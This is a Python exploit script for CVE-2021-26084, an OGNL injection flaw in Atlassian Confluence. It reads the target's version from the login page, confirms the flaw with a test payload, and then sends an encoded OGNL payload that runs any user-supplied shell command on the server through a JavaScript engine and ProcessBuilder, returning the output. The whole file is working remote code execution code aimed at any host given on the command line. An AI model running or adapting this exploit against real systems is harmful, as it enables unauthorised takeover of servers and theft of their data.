exploit.py

import requests
import re
import sys
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings()

def check(host):

	r = requests.get(host+"/login.action")
	if(r.status_code == 200):
		filter_version = re.findall("<span id='footer-build-information'>.*</span>",r.text)
		if(len(filter_version)>=1):
			version = filter_version[0].split("'>")[1].split('</')[0]
			return version
		else:
			return False
	else:
		return host
def exploit(host, command):
	if(command == 0):
		payload = "%5Cu0027%2b#{%5Cu0022%5Cu0022[%5Cu0022class%5Cu0022]}%2b%5Cu0027"
		headers = {"Content-Type": "application/x-www-form-urlencoded"}
		r = requests.post(host + "/pages/doenterpagevariables.action", data="queryString="+payload, headers=headers, verify=False)
		soup = BeautifulSoup(r.text, "html.parser")
		try:
			comand_result = soup.find("input", {"name":"queryString"})['value']
			return comand_result
		except:
			return False
	else:
		command = command.replace('"', '%5Cu0022').replace("'","%5Cu0027").replace(' ',"%20")
		#payload = "%5Cu0027%2b#{%5Cu0022%5Cu0022[%5Cu0022class%5Cu0022].forName(java.lang.Runtime).getRuntime().exec(%5Cu0027"+command+"%5Cu0027)}%2b%5Cu0027" - payload without output using Runtime
		payload = "%5cu0027%2b{Class.forName(%5cu0027javax.script.ScriptEngineManager%5cu0027).newInstance().getEngineByName(%5cu0027JavaScript%5cu0027).%5cu0065val(%5cu0027var+isWin+%3d+java.lang.System.getProperty(%5cu0022os.name%5cu0022).toLowerCase().contains(%5cu0022win%5cu0022)%3b+var+cmd+%3d+new+java.lang.String(%5cu0022"+command+"%5cu0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(%5cu0022cmd.exe%5cu0022,+%5cu0022/c%5cu0022,+cmd)%3b+}+else{p.command(%5cu0022bash%5cu0022,+%5cu0022-c%5cu0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}%5cu0027)}%2b%5cu0027"
		headers = {"Content-Type": "application/x-www-form-urlencoded"}
		r = requests.post(host + "/pages/doenterpagevariables.action", data="queryString="+payload, headers=headers, verify=False)
		soup = BeautifulSoup(r.text, "html.parser")
		if(soup.find("input", {"name":"queryString"})['value']):
			comand_result = soup.find("input", {"name":"queryString"})['value']

		return comand_result


if(len(sys.argv) < 3):
	print("USE: python3 " + sys.argv[0] + " https://target.com cmd")
	print("ex: python3 " + sys.argv[0] + " https://target.com id")

else:
	target = sys.argv[1]
	cmd = sys.argv[2]
	version = check(target)
	print("============ GET Confluence Version ============")
	if(version):
		print("Version: " + version)
	else:
		print("Version: Not Found")
	print('\n')
	print("=== Testing OGNL payload with simple payload ===")
	result = exploit(target,0)
	if result and 'class java.lang.String' in result:
		print("Command Output: " + result) 
		print("\033[0;31m[!] This target is vulnerable to CVE-2021-26084\033[0m")
	
		print('\n')
		print("=== Send OGNL payload with RCE ===")
		result = exploit(target,cmd)
		print("Command Output: " + result) 
		print('\n')
	else:
		print("[x] This target is not vulnerable!")